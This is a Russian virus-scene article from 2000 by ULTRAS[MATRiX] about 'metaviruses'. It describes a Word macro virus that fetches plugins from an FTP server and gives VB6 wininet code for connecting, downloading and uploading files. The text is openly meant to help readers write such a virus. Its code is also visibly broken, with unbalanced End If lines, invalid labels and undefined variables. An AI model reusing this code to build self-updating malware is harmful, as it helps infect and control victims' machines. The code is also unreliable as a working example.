Метавирусы - 27:07 - by Ultras
 
В этой статье я попробую рассказать - о подкачке вирусом дополнений из интернета для макро
зверей...

Всего несколько метавирусов были выпущенны на свет, вирумакеры не стали писать таких вирей из того
что это давольно геморно. Я тоже не смог написать такой вирус на asm один, и я решил написать этот 
вирус с маленьким составом. При написание такого вируса я подумал а почему на асме? и только для win32,
и выпив пивка я решил написать макро вирус с подкачкой. Мне хотелось что нибудь оригинальное и я решил сделать
это через FTP. Писал я это пока пиво не закончилось, тут описан маленький кусок алгоритма. Это просто первая 
папыика написать вирус под w0rd с плагинами. 


									ULTRAS[MATRiX]
									  (c) 2000

Начало кода
~~~~~~~~~~~

Этот метод использует windoze api.


'типа windozeAPI: download virus plugin

Private Declare Function FtpGetFile Lib "wininet.dll" Alias "FtpGetFileA" _
  (ByVal hftpSession As Long, _
    ByVal lpszRemoteFile As String, _
    ByVal lpszNewFile As String, _
    ByVal fFailIfExists As Boolean, _
    ByVal dwFlagsAndAttributes As Long, _
    ByVal dwFlags As Long, _
    ByVal dwContext As Long) _
  As Boolean

'типа windozeAPI: download virus plugin

Private Declare Function FtpPutFile Lib "wininet.dll" Alias "FtpPutFileA" _
  (ByVal hftpSession As Long, _
    ByVal lpszLocalFile As String, _
    ByVal lpszRemoteFile As String, _
    ByVal dwFlags As Long, _
    ByVal dwContext As Long) _
  As Boolean

' возможно эти api понадобиться вам в вирусе

Private Declare Function FtpSetCurrentDirectory Lib "wininet.dll" _
  Alias "FtpSetCurrentDirectoryA" _
  (ByVal hftpSession As Long, _
    ByVal lpszDirectory As String) _
  As Boolean
  
Private Declare Function FtpGetCurrentDirectory Lib "wininet.dll" _
  Alias "FtpGetCurrentDirectoryA" _
  (ByVal hftpSession As Long, _
    ByVal lpszCurrentDirectory As String, _
    lpdword As Long) _
  As Boolean

Private Declare Function InternetOpen _
  Lib "wininet.dll" _
  Alias "InternetOpenA" _
  (ByVal sAgent As String, _
    ByVal lAccessType As Long, _
    ByVal sProxyName As String, _
    ByVal sProxyBypass As String, _
    ByVal lFlags As Long) _
  As Long

' всякое дерьмо, константы

Private Const INTERNET_OPEN_TYPE_PRECONFIG As Long = 0
Private Const INTERNET_OPEN_TYPE_DIRECT As Long = 1
Private Const INTERNET_OPEN_TYPE_PROXY As Long = 3
Private Const INTERNET_INVALID_PORT_NUMBER As Long = 0
Private Const FTP_TRANSFER_TYPE_ASCII As Long = &H1
Private Const FTP_TRANSFER_TYPE_BINARY As Long = &H2
Private Const INTERNET_FLAG_PASSIVE As Long = &H8000000

Private Declare Function InternetConnect _
  Lib "wininet.dll" _
  Alias "InternetConnectA" _
  (ByVal hInternetSession As Long, _
    ByVal sServerName As String, _
    ByVal nServerPort As Integer, _
    ByVal sUsername As String, _
    ByVal sPassword As String, _
    ByVal lService As Long, _
    ByVal lFlags As Long, _
    ByVal lContext As Long) _
  As Long
                
Private Const INTERNET_ERROR_BASE = 12000
Private Const ERROR_INTERNET_OUT_OF_HANDLES As Long = (INTERNET_ERROR_BASE + 1)
Private Const ERROR_INTERNET_TIMEOUT As Long = (INTERNET_ERROR_BASE + 2)
Private Const ERROR_INTERNET_EXTENDED_ERROR As Long = (INTERNET_ERROR_BASE + 3)
Private Const ERROR_INTERNET_INTERNAL_ERROR As Long = (INTERNET_ERROR_BASE + 4)
Private Const ERROR_INTERNET_INVALID_URL As Long = (INTERNET_ERROR_BASE + 5)
Private Const ERROR_INTERNET_UNRECOGNIZED_SCHEME As Long = (INTERNET_ERROR_BASE + 6)
Private Const ERROR_INTERNET_NAME_NOT_RESOLVED As Long = (INTERNET_ERROR_BASE + 7)
Private Const ERROR_INTERNET_PROTOCOL_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 8)
Private Const ERROR_INTERNET_INVALID_OPTION As Long = (INTERNET_ERROR_BASE + 9)
Private Const ERROR_INTERNET_BAD_OPTION_LENGTH As Long = (INTERNET_ERROR_BASE + 10)
Private Const ERROR_INTERNET_OPTION_NOT_SETTABLE As Long = (INTERNET_ERROR_BASE + 11)
Private Const ERROR_INTERNET_SHUTDOWN As Long = (INTERNET_ERROR_BASE + 12)
Private Const ERROR_INTERNET_INCORRECT_USER_NAME As Long = (INTERNET_ERROR_BASE + 13)
Private Const ERROR_INTERNET_INCORRECT_PASSWORD As Long = (INTERNET_ERROR_BASE + 14)
Private Const ERROR_INTERNET_LOGIN_FAILURE As Long = (INTERNET_ERROR_BASE + 15)
Private Const ERROR_INTERNET_INVALID_OPERATION As Long = (INTERNET_ERROR_BASE + 16)
Private Const ERROR_INTERNET_OPERATION_CANCELLED As Long = (INTERNET_ERROR_BASE + 17)
Private Const ERROR_INTERNET_INCORRECT_HANDLE_TYPE As Long = (INTERNET_ERROR_BASE + 18)
Private Const ERROR_INTERNET_INCORRECT_HANDLE_STATE As Long = (INTERNET_ERROR_BASE + 19)
Private Const ERROR_INTERNET_NOT_PROXY_REQUEST As Long = (INTERNET_ERROR_BASE + 20)
Private Const ERROR_INTERNET_REGISTRY_VALUE_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 21)
Private Const ERROR_INTERNET_BAD_REGISTRY_PARAMETER As Long = (INTERNET_ERROR_BASE + 22)
Private Const ERROR_INTERNET_NO_DIRECT_ACCESS As Long = (INTERNET_ERROR_BASE + 23)
Private Const ERROR_INTERNET_NO_CONTEXT As Long = (INTERNET_ERROR_BASE + 24)
Private Const ERROR_INTERNET_NO_CALLBACK As Long = (INTERNET_ERROR_BASE + 25)
Private Const ERROR_INTERNET_REQUEST_PENDING As Long = (INTERNET_ERROR_BASE + 26)
Private Const ERROR_INTERNET_INCORRECT_FORMAT As Long = (INTERNET_ERROR_BASE + 27)
Private Const ERROR_INTERNET_ITEM_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 28)
Private Const ERROR_INTERNET_CANNOT_CONNECT As Long = (INTERNET_ERROR_BASE + 29)
Private Const ERROR_INTERNET_CONNECTION_ABORTED As Long = (INTERNET_ERROR_BASE + 30)
Private Const ERROR_INTERNET_CONNECTION_RESET As Long = (INTERNET_ERROR_BASE + 31)
Private Const ERROR_INTERNET_FORCE_RETRY As Long = (INTERNET_ERROR_BASE + 32)
Private Const ERROR_INTERNET_INVALID_PROXY_REQUEST As Long = (INTERNET_ERROR_BASE + 33)
Private Const ERROR_INTERNET_NEED_UI As Long = (INTERNET_ERROR_BASE + 34)
Private Const ERROR_INTERNET_HANDLE_EXISTS As Long = (INTERNET_ERROR_BASE + 36)
Private Const ERROR_INTERNET_SEC_CERT_DATE_INVALID As Long = (INTERNET_ERROR_BASE + 37)
Private Const ERROR_INTERNET_SEC_CERT_CN_INVALID As Long = (INTERNET_ERROR_BASE + 38)
Private Const ERROR_INTERNET_HTTP_TO_HTTPS_ON_REDIR As Long = (INTERNET_ERROR_BASE + 39)
Private Const ERROR_INTERNET_HTTPS_TO_HTTP_ON_REDIR As Long = (INTERNET_ERROR_BASE + 40)
Private Const ERROR_INTERNET_MIXED_SECURITY As Long = (INTERNET_ERROR_BASE + 41)
Private Const ERROR_INTERNET_CHG_POST_IS_NON_SECURE As Long = (INTERNET_ERROR_BASE + 42)
Private Const ERROR_INTERNET_POST_IS_NON_SECURE As Long = (INTERNET_ERROR_BASE + 43)
Private Const ERROR_INTERNET_CLIENT_AUTH_CERT_NEEDED As Long = (INTERNET_ERROR_BASE + 44)
Private Const ERROR_INTERNET_INVALID_CA As Long = (INTERNET_ERROR_BASE + 45)
Private Const ERROR_INTERNET_CLIENT_AUTH_NOT_SETUP As Long = (INTERNET_ERROR_BASE + 46)
Private Const ERROR_INTERNET_ASYNC_THREAD_FAILED As Long = (INTERNET_ERROR_BASE + 47)
Private Const ERROR_INTERNET_REDIRECT_SCHEME_CHANGE As Long = (INTERNET_ERROR_BASE + 48)
Private Const ERROR_INTERNET_DIALOG_PENDING As Long = (INTERNET_ERROR_BASE + 49)
Private Const ERROR_INTERNET_RETRY_DIALOG As Long = (INTERNET_ERROR_BASE + 50)
Private Const ERROR_INTERNET_HTTPS_HTTP_SUBMIT_REDIR As Long = (INTERNET_ERROR_BASE + 52)
Private Const ERROR_INTERNET_INSERT_CDROM As Long = (INTERNET_ERROR_BASE + 53)

' FTP API Errors
Private Const ERROR_FTP_TRANSFER_IN_PROGRESS As Long = (INTERNET_ERROR_BASE + 110)
Private Const ERROR_FTP_DROPPED  As Long = (INTERNET_ERROR_BASE + 111)
Private Const ERROR_FTP_NO_PASSIVE_MODE  As Long = (INTERNET_ERROR_BASE + 112)


' Number of the TCP/IP port on the server to connect to.
Private Const INTERNET_DEFAULT_FTP_PORT As Long = 21
Private Const INTERNET_DEFAULT_GOPHER_PORT As Long = 70
Private Const INTERNET_DEFAULT_HTTP_PORT As Long = 80
Private Const INTERNET_DEFAULT_HTTPS_PORT As Long = 443
Private Const INTERNET_DEFAULT_SOCKS_PORT As Long = 1080

Private Const INTERNET_OPTION_CONNECT_TIMEOUT As Long = 2
Private Const INTERNET_OPTION_RECEIVE_TIMEOUT As Long = 6
Private Const INTERNET_OPTION_SEND_TIMEOUT As Long = 5

Private Const INTERNET_OPTION_USERNAME As Long = 28
Private Const INTERNET_OPTION_PASSWORD As Long = 29
Private Const INTERNET_OPTION_PROXY_USERNAME As Long = 43
Private Const INTERNET_OPTION_PROXY_PASSWORD As Long = 44

Private Const INTERNET_SERVICE_FTP As Long = 1
Private Const INTERNET_SERVICE_GOPHER As Long = 2
Private Const INTERNET_SERVICE_HTTP As Long = 3

Private Const INTERNET_FLAG_RELOAD As Long = &H80000000
Private Const INTERNET_FLAG_KEEP_CONNECTION As Long = &H400000
Private Const INTERNET_FLAG_MULTIPART As Long = &H200000
Private Const GENERIC_READ As Long = &H80000000
Private Const GENERIC_WRITE As Long = &H40000000

Private Declare Function FtpOpenFile _
  Lib "wininet.dll" _
  Alias "FtpOpenFileA" _
  (ByVal hftpSession As Long, _
    ByVal sFileName As String, _
    ByVal lAccess As Long, _
    ByVal lFlags As Long, _
    ByVal lContext As Long) _
  As Long
    
Private Declare Function FtpDeleteFile _
  Lib "wininet.dll" _
  Alias "FtpDeleteFileA" _
  (ByVal hftpSession As Long, _
    ByVal lpszFileName As String) _
  As Boolean

Private Declare Function _
  InternetCloseHandle _
  Lib "wininet.dll" _
  (ByVal hInet As Long) _
  As Integer
  
' Private variables to support class properties
Private u_strProxyString As String
Private u_lngSessionHandle As Long
Private u_lngConnectionHandle As Long
Private u_fSessionActive As Boolean
Private u_strUserName As String
Private u_strPassword As String
Private u_strServer As String
Private u_lngTransferType  As Long
Private u_strLastDLLError As String

'Функуция Connect FTP server

Public Function Connect() As Boolean
  ' Comments  : Функуция Connect FTP server
  ' Returns   : True если удачно, False хрен

  Dim fConnected As Boolean
  On Error GoTo errorz

  u_fSessionActive = False
  u_lngSessionHandle = 0
  u_lngConnectionHandle = 0


  u_strServer = txtServer ' адрес сервера
  u_strUserName = txtUserName ' имя пользователя
  u_strPassword = txtPassword ' пароль


  u_lngConnectionHandle = InternetConnect(u_lngSessionHandle, u_strServer, _
  INTERNET_INVALID_PORT_NUMBER, u_strUserName, u_strPassword, _
  INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0)
          
        GetDLLError
        
        ' Проверяем что нам возратилось
        If u_lngConnectionHandle <> 0 Then
          ' Мы активны!!!
          fConnected = True
          u_fSessionActive = True
                      
        Else
          fConnected = False
        End If
      End If
    End If
  End If
      
  _ret:
  Connect = fConnected
  Exit Function
  
errorz:
  MsgBox "Ошибка"
  resume _ret
End Function

'Функуция Disconnect FTP server

Public Sub Disconnect()
  On Error GoTo errorz
  
  ' Дисконект только если мы подключены к FTP
  If u_lngConnectionHandle <> 0 Then

    ClearDLLError
    
    ' Закроем наш конект
    InternetCloseHandle u_lngConnectionHandle
    
    ' Сохраним ошибку
    GetDLLError
    
    ' Восстановите connhandle
    u_lngConnectionHandle = 0
    
    ' Поменяем метку
    u_fSessionActive = False
    
  End If

  _ret:
  Exit Sub
  
errorz:
  MsgBox "Ошибка"
  Resume _ret
End Sub

Private Sub ClearDLLError()
  u_strLastDLLError = ""
End Sub


Private Sub GetDLLError()
  On Error GoTo errorz
  u_strLastDLLError = Err.LastDLLError
  
  _ret:
  Exit Sub
    
errorz:
  MsgBox "Ошибка"
  Resume _ret
End Sub

Public Function OpenSession() As Boolean
  ' Comments  : Открывает сеанс в ресурс Interenet(FTP)
  ' Returns   : True if the session opened succesfully, False otherwise

  Dim fOpened As Boolean
  
  On Error GoTo errorz
  
  ' ОПЗ...
  fOpened = False
  
  ClearDLLError
  
  If u_strProxyString = "" Then
    u_lngSessionHandle = InternetOpen(mcstrUserAgent, INTERNET_OPEN_TYPE_DIRECT, _
    vbNullString, vbNullString, 0)
  Else
    u_lngSessionHandle = InternetOpen(mcstrUserAgent, INTERNET_OPEN_TYPE_PROXY, _
    u_strProxyString, vbNullString, 0)
  End If
  
  GetDLLError
  
  fOpened = (u_lngSessionHandle <> 0)
  
_ret:
  OpenSession = fOpened
  Exit Function
  
errorz:
  MsgBox "Ошибка"
  Resume _ret
  
End Function

'Закачка файла aka Download plugin

Public Function GetFile( _
  strRemoteFile As String, _
  strLocalFile As String) _
  As Boolean
  ' Comments  : Download plugin
  ' Parameters: strRemoteFile - Path и имя файла в сервере FTP
  '             strLocalFile - Path имя файла куда записывать клиенту
  ' Returns   : True если удачно, False хрен

  Dim fRetval As Boolean
  Dim strFileOnRemote As String
  Dim strDirOnRemote As String

  On Error GoTo errorz
  
  ' Проверим мы в FTP
  If u_fSessionActive Then
    
    ' Проверка имен файлов
    If strRemoteFile <> "" And strLocalFile <> "" Then
      
      ' Получим name/path
      strDirOnRemote = GetPathFromFTPPath(strRemoteFile)
      strFileOnRemote = GetNameFromFTPPath(strRemoteFile)
            
      ' Измените директорий в remote сервере
      RemoteChDir strDirOnRemote
      
      ClearDLLError
      
      ' Воаля
      fRetval = FtpGetFile(u_lngConnectionHandle, strFileOnRemote, _
        strLocalFile, False, FILE_ATTRIBUTE_NORMAL, _
        INTERNET_FLAG_RELOAD Or u_lngTransferType, 0)

      GetDLLError
      
    End If
    
  End If
  
  _ret:
  GetFile = fRetval
  Exit Function
    
errorz:
MsgBox "Ошибка"
  Resume _ret
    
End Function

'Upload plugin

Public Function PutFile( _
  strLocalFile As String, _
  strRemoteFile As String) _
  As Boolean
  ' Comments  : Upload plugin
  ' Parameters: strLocalFile - path и имя текущего файла
  '             strRemoteFile - path и имя текущего файла
  ' Returns   : True если удачно, False хрен
  '
  Dim fRetval As Boolean
  Dim strFileOnRemote As String
  Dim strDirOnRemote As String
  Dim strFileOnLocal As String
  Dim strTmp As String
  
  On Error GoTo errorz
  
  ' Проверим мы в FTP
  If u_fSessionActive Then
    
    ' Проверка имен файлов
    If strLocalFile <> "" And strRemoteFile <> "" Then
    
      ' Parse file names
      strTmp = strRemoteFile
      strDirOnRemote = Right(strTmp, Len(strTmp) - Len(u_strServer))
      strFileOnRemote = strRemoteFile
      strFileOnLocal = strLocalFile
      
      ' Проверка корневой диры
      If (strDirOnRemote = "") Then
        strDirOnRemote = "/"
      End If
      
      ' поменяем директорию на ftp какая нам нужна
      RemoteChDir strDirOnRemote
  
      ClearDLLError
      
      ' Посылаем файл на FTP
      fRetval = FtpPutFile(u_lngConnectionHandle, strFileOnLocal, _
        strFileOnRemote, u_lngTransferType, 0)
        
	' Проверка на глюки
      GetDLLError
      
    End If
    
  End If
  
  _ret:
  PutFile = fRetval
  Exit Function
    
errorz:
  MsgBox "Ошибка"
  Resume _ret
  
End Function

Ну вот и все правдо может я параметры некоторые не написал влом мне проверять, пиво закончилось..
Некоторые опций я не описал типа FtpSetCurrentDirectory там и так все ясно, короче идея есть немного кода есть
хватит чтобы чтонибудь написать.... Некоторые параметры придется изменить так как писал я не в ворде a в VB 6.0.

Могут быть глюки, они и у меня были потому что я не все до конца отладил, но все таки это работало.

				
						Just do it...

L0rd Ultra
(с) 2000